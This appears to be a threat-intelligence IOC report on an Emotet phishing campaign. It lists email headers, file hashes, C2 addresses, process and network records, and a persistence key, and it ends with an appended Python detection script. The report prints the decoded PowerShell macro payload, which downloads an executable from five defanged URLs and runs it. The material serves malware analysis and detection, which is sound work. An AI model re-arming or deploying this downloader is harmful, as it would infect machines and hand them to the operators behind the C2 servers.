- #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
- https://pastebin.com/F520pqQW
- previous_contact:
- 28/01/19 https://pastebin.com/z2TDfM7s
- 23/01/18 https://pastebin.com/D9TDts5J
- 20/12/18 https://pastebin.com/EejcbL4t
- 04/12/18 https://pastebin.com/znQDtbnt
- 09/11/18 https://pastebin.com/THHMs2wg
- 01/10/18 https://pastebin.com/Y6DnbpHv
- FAQ:
- attack_vector
- --------------
- email attach .doc > macro > WMI > powershell -enc > GET 5 URL > \Users\%name%\206.exe > C:\Users\%name%\AppData\Local\?\?.exe
- email_headers
- --------------
- Received: from diossa.com.mx (u21557617.onlinehome-server.com [198.251.79.161])
- Received: from [24.51.132.88] (unknown [24.51.132.88]) by diossa.com.mx (Postfix)
- Date: Wed, 15 May 2019 17:00:50 -0500
- From: Севернюк Татьяна <ventas_tpc@diossa.com.mx>
- To: <user00@victim01>
- Subject: RE: RE: Ціновий запит_комплектація для санвузла
- files
- --------------
- SHA-256 e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee
- File name DATA-916228-2122097647.doc [Composite Document File V2 Document, Application: Microsoft Office Word]
- File size 145.13 KB (148608 bytes)
- SHA-256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
- File name l4gktj_307970247.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 75 KB (76800 bytes)
- activity
- **************
- macro_ps_b64_decoded:
- --------------
- $d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'
- PL_SCR 5 / 5
- --------------
- http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/
- http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/
- https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/
- http://adsprout[.] co/wp/oMrTbPUxE/
- http://springhelp[.] co[.] za/wp/jMSZNshHRf/
- C2
- --------------
- 78.188.7.213:8090
- 138.68.13.161:8080
- netwrk
- --------------
- 37.9.175.14 tomasoleksak{.} com GET /wp-includes/zm2ga7ha2l_5q8wl-2798/ HTTP/1.1 no User Agent (!)
- 78.188.7.213 78.188.7.213:8090 POST /health/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
- 138.68.13.161 138.68.13.161:8080 POST /loadan/enable/stubs/merge/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
- comp
- --------------
- powershell.exe 2632 TCP localhost 49539 37.9.175.14 80 ESTABLISHED
- eventssmall.exe 2108 TCP localhost 49540 90.57.69.215 80 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49542 191.92.69.115 80 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49544 75.177.169.225 80 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49546 78.188.7.213 8090 ESTABLISHED
- eventssmall.exe 2108 TCP localhost 49547 207.44.45.27 22 SYN_SENT
- eventssmall.exe 2108 TCP localhost 49548 138.68.13.161 8080 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- ... [another context]
- C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN...==
- C:\Users\operator\206.exe
- C:\Users\operator\206.exe --d4ba2bdd
- C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
- C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 16.05.2019 11:08
- eventssmall
- c:\users\operator\appdata\local\eventssmall\eventssmall.exe 03.09.2012 12:06
- drop
- --------------
- %temp%\VBE\
- %temp%\Word8.0\MSForms.exd
- C:\Users\operator\206.exe [removed]
- C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
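- Added detection example, not part of the original paste: a Python check that walks constructed process and HTTP records (modelled on the proc and netwrk sections above) and flags the stages of the attack_vector chain: encoded PowerShell spawned by wmiprvse.exe, a numeric-named .exe dropped under the profile root by PowerShell, the AppData\Local relaunch with an 8-hex-char argument, and the payload GET sent with no User-Agent. The record layout, rule names and sample events are assumptions.

```python
import re

# Constructed sample telemetry modelled on the proc / netwrk sections of this paste.
# Record: (kind, image, parent_image, detail); kind "proc" carries the command line,
# kind "http" carries the request line plus "UA=<user agent>" (empty when none was sent).
SAMPLE_EVENTS = [
    ("proc", r"C:\Windows\system32\wbem\wmiprvse.exe",
     r"C:\Windows\system32\svchost.exe", "wmiprvse.exe -secured -Embedding"),
    ("proc", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\system32\wbem\wmiprvse.exe", "powershell.exe -enc JABkADcAN..."),
    ("proc", r"C:\Users\operator\206.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "206.exe"),
    ("proc", r"C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe",
     r"C:\Users\operator\206.exe", "eventssmall.exe --21b679c3"),
    ("http", "powershell.exe", None,
     "GET /wp-includes/zm2ga7ha2l_5q8wl-2798/ HTTP/1.1 UA="),
    ("http", "eventssmall.exe", None, "POST /health/ HTTP/1.1 UA=Mozilla/4.0"),
    ("proc", r"C:\Windows\System32\notepad.exe",
     r"C:\Windows\explorer.exe", "notepad.exe readme.txt"),  # benign control record
]

# <drive>:\Users\<name>\<digits>.exe, the first-stage drop location seen above
PROFILE_ROOT_EXE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\\d+\.exe$", re.I)
# trailing --xxxxxxxx argument used by the second-stage self-relaunch
HEX_ARG = re.compile(r"\s--[0-9a-f]{8}$", re.I)
# -enc / -encodedcommand / -e switch on the PowerShell command line
ENC_FLAG = re.compile(r"\s-e(nc|ncodedcommand)?\s", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower() if path else ""

def detect(events):
    """Return (rule, image) pairs for records matching the chain described in this paste."""
    hits = []
    for kind, image, parent, detail in events:
        if kind == "proc":
            if basename(image) == "powershell.exe" and basename(parent) == "wmiprvse.exe" \
                    and ENC_FLAG.search(detail):
                hits.append(("wmi_spawned_encoded_powershell", image))
            if PROFILE_ROOT_EXE.match(image) and basename(parent) == "powershell.exe":
                hits.append(("numeric_exe_dropped_by_powershell", image))
            if "\\appdata\\local\\" in image.lower() and HEX_ARG.search(detail):
                hits.append(("appdata_exe_hex_relaunch", image))
        elif kind == "http" and detail.endswith("UA=") and basename(image) == "powershell.exe":
            hits.append(("powershell_get_without_user_agent", image))
    return hits

if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```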
- # # #
- https://www.virustotal.com/gui/file/4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2/details
- https://www.virustotal.com/gui/file/e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee/details
- https://analyze.intezer.com/#/analyses/8f8911d3-7fb2-4e0d-9073-6c178d68c3ef
- VR